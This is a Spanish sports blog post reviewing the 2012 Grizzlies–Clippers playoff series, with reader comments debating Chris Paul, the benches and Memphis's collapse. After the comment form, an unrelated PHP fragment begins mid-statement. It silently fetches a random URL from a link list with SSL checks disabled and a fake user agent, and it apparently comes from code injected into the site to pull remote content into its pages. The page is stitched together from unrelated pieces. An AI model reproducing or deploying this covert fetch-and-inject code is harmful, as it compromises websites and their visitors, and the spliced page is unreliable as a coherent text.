Resumen Grizzlies 3 – Clippers 4

15 de May de 2012 por TheDeerHunter

Posiblemente la eliminatoria más compleja e igualada de primera ronda. Nos quedamos con una sensación extraña de lo que pudo haber sido y no fue, como también que el mejor de los dos se va de vacaciones. Muchas veces el más listo es quien se lleva el gato al agua. Lástima por el duro golpe que se lleva el proyecto en Memphis, así como la imagen que queda de alguna de sus piezas clave.

Existe un antes y un después de todo lo que podamos hablar de la eliminatoria. Los 9 últimos minutos del primer partido. Un atasco monumental de los osos, con un parcial de 28-3 que desperdiciaba una renta de 27 puntos. Mala manera de pasar a la historia. ¿Qué hubiera ocurrido de haber sido capaces de administrar la situación? Con casi total seguridad estaríamos hablando de lo equilibrado que está el equipo, del gran entrenador que es Lionel Hollins, de lo bien que defienden o de lo buenos que son Gay o Conley…

Pero no. No se sabe muy bien porqué los Grizzlies han perdido el norte en esta serie. Aquella remontada no es más que la punta del iceberg. Citando a Daimiel: “En el tercer partido los Grizzlies rizaron el rizo. Encajaron un parcial en contra de 18-1 en la primera mitad. Se levantaron y en el último cuarto se pasaron once minutos y medio con sólo una canasta en juego anotada” Añadimos las intermitencias de Marc y Randolph… Errores de dirección. No sólo por la calamidad de serie que ha firmado Conley, sino simplemente porque no hemos llegado a ver a qué jugaban o cual era el reparto de papeles. Muy diferente de lo claro que lo tenían el año pasado o, en una comparación mucho más cruel, por cómo se han comportado los Clippers y Del Negro en ese sentido. Viendo a Zach falto de forma, no se ha logrado encontrar referente. Un día Gay, al otro Conley y el siguiente Marc. Los papeles han sido una lotería. En frente, ante la duda balones a Chris Paul. Sólo por esto ya justifica el lío que se armó este verano.

Además, los Clippers se han visto beneficiados de un sorprendente fondo de armario, el cual ha llegado incluso a eclipsar a la línea titular. Extraordinaria serie de Young, Martin, Evans o Bledsoe y excelente Del Negro por confiar como toca en ellos.

MVP: Chris Paul ha sido el hombre orquesta para Clippers esta serie. El más listo de la clase con más de 20 ptos, casi 6 rebotes, 7 asistencias y casi 3 robes. ¡Jugón!

La sorpresa: Teníamos dudas de la solvencia de Nick Young para afrontar este tipo de situaciones. Las ha liado gordas con su cerca de 53% en triples. El referente ofensivo de una gran segundad unidad.

La decepción: En contraposición, flojo rendimiento de la segunda de Memphis. Destacamos a Mayo y Speights como elementos clave de la derrota. Arenas tampoco ha sido un factor, por si alguien tenía esperanzas.

El mayor esfuerzo en vano: No entendemos porqué en ocasiones se duda del último all-star de la franquicia como principal referente en según qué momentos. Ha sido mejor cuanto más cuesta arriba se ponía todo. Extraordinarias sus 3 últimas actuaciones del curso.

Comenta

8 comentarios a esta entrada

  1. Esteban dice:
    #1

    Es sorprente lo subestimados q han sido los clippers todo este año como tamb del negro, es inadmisible q todo el analisis se pierda hablando del perdedor de la serie y no del ganador
    La serie de cp3 merece un post aparte y aqui apenas se lo nombra, una vez sale el nombre de evans
    Ni una mencion a la lesion de butler quien inclusi se perdio un juego
    Ni una sola palabra de griffin q ha jugado una serie por ensima de sus posibilidades, mejor q en la regular y firmando su mejor partido de la temporada

    Lo de del negro tamb es admirable, su personalidad y su desicion de hacer jugar a rocas como evans o crios como bledsone le ha dado la serie, y aqui se habla de hollins

    Mal enfocado para mi gusto el analisis, los ganadores siempre mercen mas espacio q los perdedores

      Citar

  2. Ru dice:
    #2

    Como punto de partida de un proyecto creo que llegar a semifinales de conferencia era lo minimo exigible para este equipo,así que el traspaso por CP3 está plenamente justifcado.Han sabido jugar mejor en los momentos más críticos y junto a la extraordinaria aportación del banquillo han sido estos dos aspectos los claves de la eliminatoria.Mención aparte el juego sucio de Chris Paul principalmente,comiendo la oreja a los árbitros y simulando de cuando en cuando.KG puede estar tranquilo que tiene su sucesor.Es muy bueno,tremendamente bueno pero esa personalidad en la cancha me asquea.

    Por los Grizzlies a mí lo que más me ha sorprendido es que han presentado lagunas mentales a todos los niveles en prácticamente todos los partidos de la serie.No esperaba el nivel estratosférico de Randolph en esta serie pero ese cortocicuito desde luego que no.

    Hablando de futuro,creo que el bloque es muy bueno;deben trabajar,dejando las lesiones aparte,en conjuntar a Gay y Randolph fundamentalmente.Sigo confiando en Conley pero sacrificaría uno de los dos,entre éste y OJ,y me haría con algo de veteranía.Si Conley sigue,traspasaría a Mayo por Ray Allen.Si se apuesta a Mayo traspasaria a Conley por Nash(todo vía sign & trade).Viendo el roster del equipo creo más necesario el papel de tirador,asi que encaja mejor Ray Allen.Qualifying sobre Speights si no se descuelga en sus peticiones y el resto de jugadores que acaban contrato ciao ciao.

      Citar

  3. Esteban dice:
    #3

    jajaja dios, sera por marc pero todos eran de menphis? ahora odian a los clippers?

    enojense con su equipo, pero respeten a los ganadores

    menphis, como diria maradona, LA TENES ADENTRO

    go clippers!! CP3 MVP!

      Citar

  4. Sancho88 dice:
    #4

    Hombre, en España hay una especie de relación amor-odio con los Grizzlies, también conocidos como los Gremlins, o en momentos de gran crisis incluso como los Grittels (sí, ya sé que después de este comentario alguno de los lectores desearía que aún existiese el Megaupload para pasarse un finde semana entero viendo primero toda la saga de Gremlins y posteriormente la de los Grittels para comparar, pero eso ya no es posible…). En fin… por dónde iba… ah, sí… lo del amor odio con los Grizzlies. Pues para bien o para mal los Grizzlies formarán parte siempre de la historia de nuestro baloncesto. Allí por primera vez un español jugó un partido del All-Star, tb. de Playoffs… y a pesar de que no nos gustaba mucho el equipo, pues hombre, por el tema de Pau y tal todos hemos seguidos siempre sus calamidades. Luego fue Navarro, y ahora está Marc. Yo personalmente no siento ninguna predilección con este equipo, como tampoco la siento con los Clippers. Soy bastante neutral en esta serie. Creo que quizá el análisis ha ido más a analizar el batacazo de los Grizzlies, no porque seamos o dejemos de ser de los Grizzlies, sino porque ha sido un sorpresón mayúsculo, al menos para mí. Vale que Paul quizá sea el mejor base de la historia del baloncesto (ironía), y que no creo que nazca nunca nadie como él (ironía otra vez), pero no nadie esperaba que aun con el mejor base de la historia del baloncesto (otra vez) estos Clippers pasaran de ronda, y si somos objetivos la sola caída de este equipo merecía un post aparte, como también reconozco que la historia de los Clippers de esta temporada también merece un post aparte.

      Citar

  5. Sancho88 dice:
    #5

    hostia, que gran ofensa… Eran los Critters, por supuesto…

    http://www.youtube.com/watch?v=DgfXjzTZUSw&feature=related

    Eran adorables, si lo pensáis bien

      Citar

  6. Sancho88 dice:
    #6

    Al menos, a mí me da más miedo Reggie Evans que un critter, no sé a vosotros…

      Citar

  7. rumbero dice:
    #7

    Sancho88:
    Al menos, a mí me da más miedo Reggie Evans que un critter, no sé a vosotros…

    Y a los Critters les daría más miedo Reggie Evans que la propia muerte. Un clásico indispensable.

    Esteban:
    jajaja dios, sera por marc pero todos eran de menphis? ahora odian a los clippers?
    enojense con su equipo, pero respeten a los ganadores
    menphis, como diria maradona, LA TENES ADENTRO
    go clippers!! CP3 MVP!

    Pues a mi si, me caen mal. Tienen una serie de elementos marrulleros que no me gustan nada. Algunos parecen que hayan ganado ya 4 anillos..en fin, que no les quito ningun mérito a su pase, han sabido arremangarse cuando ha hecho falta y jugar mejor los minutos calientes, chapeau por ellos, pero obviar las desconexiones que han tenido los de Memphis sería faltar a la verdad. Esos parciales dantescos que se comentan han marcado claramente el devenir de la eliminatoria. Y si, espero que Duncan y compañía (a los que odiaba cuando se crujían año si año también a los Suns de Steve) les den bien duro.

      Citar

  8. GreenPride dice:
    #8

    Serie intensa y disputada. La más interesante de las de primera ronda. Lo era a priori y lo ha sido al final. No comparto a los que dicen que la victoria de los Clippers ha sido un sorpresón por mucho que yo era de los que pensaba que pasarían los Grizzlies pero sufriendo (dije Grizzlies en 7).
    Ha quedado claro que este año ha faltado un líder claro dentro de los Grizzlies. Con Z-Bo lastrado todavía por su lesión no ha podido ser el faro que fue el año pasado. Con ese puesto vacante, Gay ha intentado sin mucho éxito ocuparlo. Sólo lo ha conseguido a ratos contados y su imagen de jugador franquicia queda bastante tocada. Conley es quizás el otro jugador peor parado. CP3 le ha dado un baño y él no ha sabido llevar la batuta de su equipo. Buenos últimos partidos de Marc, si los Grizzlies hubieran cargado desde el principio sobre él quizás ahora no estaríamos hablando de su eliminación.
    Por lo Clippers, gran actuación de CP3 con lo que se contaba, pero también gran actuación de los suplentes. Bledsoe, Mo-Will y sobre todo Young, Evans y K-Mart han aportado de forma consistente y muy importante. Butler ha sabido hacer su trabajo en la sombra y en general se han movido mejor en los partidos duros e igualados que los de Memphis. Serie regular de Griffin al que creo que todavía le queda para ser un jugador decisivo, como lo demuestra el hecho de que se quedase en el banquillo en el cuarto decisivo de la eliminatoria.
    Para los Grizzlies es el momento de decidir si jugársela con este bloque o ir a por algún cambio importante. Yo daría continuidad a lo que hay si acaso intentado pescar algo a cambio de Mayo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>